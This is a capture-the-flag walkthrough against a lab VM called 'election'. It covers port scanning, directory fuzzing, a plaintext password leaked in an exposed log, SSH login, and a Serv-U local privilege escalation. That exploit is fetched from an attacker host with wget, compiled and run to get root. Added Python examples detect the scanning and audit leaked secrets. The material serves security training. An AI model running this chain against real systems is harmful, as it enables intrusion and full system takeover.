Port scanning with nmap

┌──(root@ghost)-[/home/ghost]
└─# nmap --min-rate 5000 -sV election.vuln -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-04 11:01 EST
Nmap scan report for election.vuln (10.0.2.89)
Host is up (0.000060s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 08:00:27:18:9B:B4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds

Nmap reports two open ports: 22 (SSH) and 80 (web server).

┌──(root@ghost)-[/home/ghost]
└─# wfuzz -c -t 100 --hc=404 -z file,/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://election.vuln/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://election.vuln/FUZZ
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                           
=====================================================================

000001059:   301        9 L      28 W       319 Ch      "javascript"                                                                                                                      
000004034:   301        9 L      28 W       317 Ch      "election"                                                                                                                        
000010811:   301        9 L      28 W       319 Ch      "phpmyadmin"                                                                                                                      
000045226:   200        375 L    964 W      10918 Ch    "http://election.vuln/"                                                                                                           
000095510:   403        9 L      28 W       278 Ch      "server-status"                                                                                                                   

Total time: 145.7574
Processed Requests: 220546
Filtered Requests: 220541
Requests/sec.: 1513.102

Fuzzing the web server turns up a few routes; election seems the most important.

┌──(root@ghost)-[/home/ghost]
└─# wfuzz -c -t 100 --hc=404 -z file,/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://election.vuln/election/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://election.vuln/election/FUZZ
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                           
=====================================================================

000000066:   301        9 L      28 W       323 Ch      "media"                                                                                                                           
000000113:   301        9 L      28 W       324 Ch      "themes"                                                                                                                          
000000168:   301        9 L      28 W       322 Ch      "data"                                                                                                                            
000000245:   301        9 L      28 W       323 Ch      "admin"                                                                                                                           
000000707:   301        9 L      28 W       321 Ch      "lib"                                                                                                                             
000000939:   301        9 L      28 W       320 Ch      "js"                                                                                                                              
000000921:   301        9 L      28 W       327 Ch      "languages"                                                                                                                       
000045226:   200        172 L    469 W      7001 Ch     "http://election.vuln/election/"                                                                                                  

Total time: 137.7917
Processed Requests: 220546
Filtered Requests: 220538
Requests/sec.: 1600.574

Fuzzing inside the /election/ folder reveals an interesting admin path.

┌──(root@ghost)-[/home/ghost]
└─# wfuzz -c -t 100 --hc=404 -z file,/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://election.vuln/election/admin/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://election.vuln/election/admin/FUZZ
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                           
=====================================================================

000000505:   301        9 L      28 W       331 Ch      "plugins"                                                                                                                         
000000536:   301        9 L      28 W       327 Ch      "css"                                                                                                                             
000000563:   301        9 L      28 W       328 Ch      "ajax"                                                                                                                            
000000939:   301        9 L      28 W       326 Ch      "js"                                                                                                                              
000000991:   301        9 L      28 W       334 Ch      "components"                                                                                                                      
000000025:   301        9 L      28 W       327 Ch      "img"                                                                                                                             
000002176:   301        9 L      28 W       327 Ch      "inc"                                                                                                                             
000002257:   301        9 L      28 W       328 Ch      "logs"                                                                                                                            
000045226:   200        129 L    805 W      8964 Ch     "http://election.vuln/election/admin/"                                                                                            

Total time: 141.7013
Processed Requests: 220546
Filtered Requests: 220537
Requests/sec.: 1556.413

Fuzzing further inside the /election/admin/ folder, we find logs.
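
How the fuzzing runs above appear in the server's access log, as an added example that is not part of the original walkthrough: a sliding-window check that flags a client whose requests are almost all 404s on distinct paths, and lists the non-404 paths that client reached. The Apache common/combined log format, the thresholds and every log line in sample_log() are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Leading fields of an Apache common/combined access-log line (assumed format).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"\S+ (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

def parse(line):
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"], int(m["status"])

def detect_enumeration(lines, window_s=10, min_404=20, min_ratio=0.9):
    """Flag clients whose requests in a sliding window are mostly distinct 404s."""
    windows = defaultdict(deque)      # ip -> (ts, path, status) inside the window
    found = defaultdict(set)          # ip -> paths that did not return 404
    alerts = {}
    for ip, ts, path, status in filter(None, map(parse, lines)):
        if status != 404:
            found[ip].add(path)
        win = windows[ip]
        win.append((ts, path, status))
        while (ts - win[0][0]).total_seconds() > window_s:
            win.popleft()
        misses = {p for _, p, s in win if s == 404}
        if (ip not in alerts and len(misses) >= min_404
                and len(misses) / len(win) >= min_ratio):
            alerts[ip] = {"first_seen": win[0][0], "distinct_404": len(misses)}
    for ip, alert in alerts.items():
        alert["found"] = sorted(found[ip])   # what the scan actually uncovered
    return alerts

def sample_log():
    """Constructed access-log lines: one noisy client, one ordinary one."""
    fmt = '{} - - [04/Mar/2023:11:05:{:02d} -0500] "GET {} HTTP/1.1" {} 278 "-" "-"'
    lines = [fmt.format("10.0.2.15", i // 20, f"/election/admin/w{i}", 404)
             for i in range(40)]
    lines.insert(25, fmt.format("10.0.2.15", 1, "/election/admin/logs", 301))
    lines += [fmt.format("10.0.2.50", 3, "/election/", 200),
              fmt.format("10.0.2.50", 4, "/favicon.ico", 404)]
    return lines

if __name__ == "__main__":
    for ip, alert in detect_enumeration(sample_log()).items():
        print(ip, alert)
```

The "found" list is the triage starting point: it names the paths the scanning client learned exist, here the logs directory.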

┌──(root@ghost)-[/home/ghost]
└─# curl http://election.vuln/election/admin/logs/system.log
[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).

After visiting http://election.vuln/election/admin/logs/ we see a link to a file called system.log, and in it we find credentials: user love with password P@$$w0rd@123.
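
The finding above comes down to a log file holding a plaintext password under the web root. As an added example (not from the original walkthrough or the election application), this audit walks a document root, flags lines in log-like files that disclose a secret, and reports them redacted. The patterns and file extensions are assumptions; the sample reuses the three system.log lines shown above.

```python
import os
import re
import tempfile

# Assumed patterns: the system.log wording first, then generic key=value forms.
SECRET_PATTERNS = [
    re.compile(r"(?i)password for (?:the )?user (?P<user>\S+):\s*(?P<secret>\S+)"),
    re.compile(r"(?i)\b(?:password|passwd|pwd|secret|token)\s*[=:]\s*(?P<secret>\S+)"),
]
# The three system.log lines from the walkthrough.
SAMPLE = (
    "[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123\n"
    "[2020-04-03 00:13:53] Love added candidate 'Love'.\n"
    "[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).\n"
)

def redact(line):
    """Return {'user', 'text'} with the secret masked, or None if nothing leaks."""
    for pat in SECRET_PATTERNS:
        m = pat.search(line)
        if m:
            text = line[:m.start("secret")] + "[REDACTED]" + line[m.end("secret"):]
            return {"user": m.groupdict().get("user"), "text": text.rstrip("\n")}

def audit_docroot(docroot, extensions=(".log", ".txt", ".bak")):
    """Walk a web document root and report secrets in files a browser could fetch."""
    findings = []
    for folder, _dirs, files in os.walk(docroot):
        for name in sorted(f for f in files if f.lower().endswith(extensions)):
            path = os.path.join(folder, name)
            url = "/" + os.path.relpath(path, docroot).replace(os.sep, "/")
            with open(path, errors="replace") as fh:
                for number, line in enumerate(fh, start=1):
                    if (hit := redact(line)):
                        findings.append({"url": url, "line": number, **hit})
    return findings

def run_sample():
    """Audit a throwaway docroot that mirrors /election/admin/logs/system.log."""
    with tempfile.TemporaryDirectory() as docroot:
        log_dir = os.path.join(docroot, "election", "admin", "logs")
        os.makedirs(log_dir)
        with open(os.path.join(log_dir, "system.log"), "w") as fh:
            fh.write(SAMPLE)
        return audit_docroot(docroot)

if __name__ == "__main__":
    print(run_sample())
```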

┌──(root@ghost)-[/home/ghost]
└─# ssh love@election.vuln           
The authenticity of host 'election.vuln (10.0.2.89)' can't be established.
ED25519 key fingerprint is SHA256:z1Xg/pSBrK8rLIMLyeb0L7CS1YL4g7BgCK95moiAYhQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'election.vuln' (ED25519) to the list of known hosts.
love@election.vuln's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-46-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

74 packages can be updated.
28 updates are security updates.

New release '20.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Thu Apr  9 23:19:28 2020 from 192.168.1.5
love@election:~$ 

The credentials work on the SSH service.

love@election:~$ cat /home/love/Desktop/user.txt
cd38ac698c0d793a5236d01003f692b0

Here is the user flag.

love@election:~$ find / -perm -u=s 2>/dev/null
/usr/bin/arping
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/sbin/pppd
/usr/local/Serv-U/Serv-U
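...

The SUID listing includes /usr/local/Serv-U/Serv-U, which is not a standard system binary, so we search for known exploits.
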
┌──(root@ghost)-[/home/ghost]
└─# searchsploit 'Serv-U Local Privilege Escalation Linux'
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                   |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)                                                                                        | linux/local/47072.rb
Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)                                                                                        | linux/local/47072.rb
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)                                                                                                      | linux/local/47009.c
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

We are going to use "Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)", linux/local/47009.c.

love@election:~$ wget -q http://10.0.2.15/47009.c
love@election:~$ gcc 47009.c -o exploit; chmod +x exploit; ./exploit
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)
opening root shell
# cat /root/root.txt
5238feefc4ffe09645d97e9ee49bc3a6